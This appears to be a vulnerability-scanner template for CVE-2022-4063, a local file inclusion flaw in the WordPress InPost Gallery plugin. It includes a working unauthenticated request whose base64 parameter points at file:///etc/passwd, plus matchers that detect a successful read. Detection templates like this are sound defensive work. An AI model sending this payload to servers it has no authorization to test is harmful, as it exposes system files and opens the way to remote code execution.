id: CVE-2022-4063

info:
  name: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion
  author: theamanrawat
  severity: critical
  description: |
    WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.
  reference:
    - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7
    - https://wordpress.org/plugins/inpost-gallery/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4063
  remediation: Fixed in version 2.1.4.1.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4063
    cwe-id: CWE-22
    cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:*:*:*
    epss-score: 0.01177
  metadata:
    max-request: 1
    verified: "true"
  tags: cve,wp-plugin,wp,inpost-gallery,cve2022,lfi,wordpress,unauth,wpscan

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# Enhanced by md on 2023/03/13